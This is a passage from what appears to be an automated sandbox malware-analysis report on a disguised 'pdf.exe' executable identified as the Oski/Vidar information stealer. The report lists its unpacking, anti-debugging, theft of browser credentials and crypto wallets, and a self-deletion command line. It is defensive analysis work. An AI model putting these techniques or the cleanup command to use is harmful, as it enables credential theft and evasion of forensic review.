                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1124 Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: New Order PO2193570O1.pdf.exe, 00000001.00000003.205443188.0000000002981000.00000004.00000001.sdmp, freebl3.dll.1.dr
                    Source: Binary string: vcruntime140.i386.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.211718078.0000000002987000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: New Order PO2193570O1.pdf.exe, 00000001.00000003.211718078.0000000002987000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: New Order PO2193570O1.pdf.exe, 00000001.00000003.207427996.0000000002981000.00000004.00000001.sdmp, msvcp140.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.206441558.0000000002981000.00000004.00000001.sdmp, mozglue.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: New Order PO2193570O1.pdf.exe, 00000001.00000003.206441558.0000000002981000.00000004.00000001.sdmp, mozglue.dll.1.dr
                    Source: Binary string: wntdll.pdbUGP source: New Order PO2193570O1.pdf.exe, 00000000.00000003.200028256.0000000009A40000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: New Order PO2193570O1.pdf.exe, 00000000.00000003.200028256.0000000009A40000.00000004.00000001.sdmp
                    Source: Binary string: msvcp140.i386.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.207427996.0000000002981000.00000004.00000001.sdmp, msvcp140.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.205443188.0000000002981000.00000004.00000001.sdmp, freebl3.dll.1.dr

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeUnpacked PE file: 1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeUnpacked PE file: 1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
                    Source: sqlite3.dll.1.drStatic PE information: section name: /4
                    Source: sqlite3.dll.1.drStatic PE information: section name: /19
                    Source: sqlite3.dll.1.drStatic PE information: section name: /35
                    Source: sqlite3.dll.1.drStatic PE information: section name: /51
                    Source: sqlite3.dll.1.drStatic PE information: section name: /63
                    Source: sqlite3.dll.1.drStatic PE information: section name: /77
                    Source: sqlite3.dll.1.drStatic PE information: section name: /89
                    Source: sqlite3.dll.1.drStatic PE information: section name: /102
                    Source: sqlite3.dll.1.drStatic PE information: section name: /113
                    Source: sqlite3.dll.1.drStatic PE information: section name: /124
                    Source: mozglue.dll.1.drStatic PE information: section name: .didat
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_709B2F60 push eax; ret 0_2_709B2F8E
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00408C65 push ecx; ret 1_2_00408C78
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00408C65 push ecx; ret 1_1_00408C78
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                    Source: Possible double extension: pdf.exeStatic PE information: New Order PO2193570O1.pdf.exe
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00419700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00419700
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,1_2_004043DF
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,1_2_00420540
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,1_2_0041E640
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,1_2_0041D360
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041F6B0 FindFirstFileExW,1_2_0041F6B0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,1_1_004043DF
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00420540 FindFirstFileA,DeleteFileA,FindNextFileA,1_1_00420540
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041E640 FindFirstFileA,FindNextFileA,FindClose,1_1_0041E640
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041F6B0 FindFirstFileExW,1_1_0041F6B0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041B4E0 GetSystemInfo,1_2_0041B4E0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004072E6
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004196D0 mov eax, dword ptr fs:[00000030h]1_2_004196D0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041B750 mov eax, dword ptr fs:[00000030h]1_2_0041B750
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004196D0 mov eax, dword ptr fs:[00000030h]1_1_004196D0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041B750 mov eax, dword ptr fs:[00000030h]1_1_0041B750
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat,1_2_0041B160
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004072E6
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00404354
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0040E5C7 SetUnhandledExceptionFilter,1_2_0040E5C7
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_004072E6
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_00404354
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0040E5C7 SetUnhandledExceptionFilter,1_1_0040E5C7

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Maps a DLL or memory area into another processShow sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 1124 & erase C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe & RD /S /Q C:\\ProgramData\\300337377349991\\* & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1124 Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1124 Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,1_2_0041AA60
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: GetLocaleInfoA,_memset,1_1_0041AA60
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\autofill\Google Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\cc\Google Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\cookies\Google Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\outlook.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\passwords.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\screenshot.jpg VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeQueries volume information: C:\ProgramData\300337377349991\system.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00416D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,1_2_00416D00
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041B1E0 GetUserNameA,1_2_0041B1E0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0040D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_0040D6E2
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected Oski StealerShow sources
                    Source: Yara matchFile source: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.204106887.0000000009830000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.1.New Order PO2193570O1.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.New Order PO2193570O1.pdf.exe.9830000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.1.New Order PO2193570O1.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.New Order PO2193570O1.pdf.exe.9830000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.New Order PO2193570O1.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected Vidar stealerShow sources
                    Source: Yara matchFile source: Process Memory Space: New Order PO2193570O1.pdf.exe PID: 1124, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219084572.000000000068A000.00000004.00000020.sdmpString found in binary or memory: Electrum-LTC
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219084572.000000000068A000.00000004.00000020.sdmpString found in binary or memory: ElectronCash
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219084572.000000000068A000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\cc\
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: window-state.json
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: exodus.conf.json
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: \\Exodus\\exodus.wallet\\
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: info.seco
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: passphrase.json
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: \\Ethereum\\
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: \\Exodus\\exodus.wallet\\
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: default_wallet
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: \\Ethereum\\
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219132553.00000000006E1000.00000004.00000020.sdmpString found in binary or memory: MultiDoge
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: seed.seco
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219252851.0000000002335000.00000004.00000040.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Tries to steal Crypto Currency WalletsShow sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior

                    Remote Access Functionality:

                    barindex
                    Yara detected Oski StealerShow sources
                    Source: Yara matchFile source: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.204106887.0000000009830000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.1.New Order PO2193570O1.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.New Order PO2193570O1.pdf.exe.9830000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.1.New Order PO2193570O1.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.New Order PO2193570O1.pdf.exe.9830000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.New Order PO2193570O1.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected Vidar stealerShow sources
                    Source: Yara matchFile source: Process Memory Space: New Order PO2193570O1.pdf.exe PID: 1124, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
